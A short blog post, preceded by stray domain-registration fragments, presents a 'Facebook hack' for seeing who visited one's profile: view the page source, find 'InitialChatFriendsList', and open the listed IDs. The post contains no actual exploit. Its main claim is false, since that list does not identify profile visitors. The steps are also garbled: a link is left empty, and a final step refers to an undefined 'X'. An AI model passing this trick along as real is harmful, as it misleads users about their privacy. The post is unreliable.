Record expires on 04-13-2014

Record created on 04-13-2003

 Domain servers in listed order:





Facebook Hack, Who visited your profile.


It’s a simple Facebook Hack nothing like some Privacy leak or something so I am not expecting any Death threats, Because of this. If you are still interested in sending some of those then send me over my personal ID not over my official one 😉

You Don’t have to give nay permission or to install anything, simply just try this over your browser and nothing like information leak. It just got 5 very simple steps.
1) Log in to your Facebook: I hope this is something very simple and need no explanation.

2) View Source or use this link “” : this is something very simple, if not simple then go to your facebook right click and view source code.

3)Search for “InitialChatFriendsList” : After going in your source code prss (ctrl+f) and search this string.
4)Right after this keyword you will see {“list”[“1111111111″,”2222222222″,…,”9999999999”]} : You going to see a string like this just after what you have searched and that will be having some random numbers.

5)Replace X with Id to view the person profile and see the person who visited your profile.

I hope this is pretty Simple, Post your comments.




Older Entries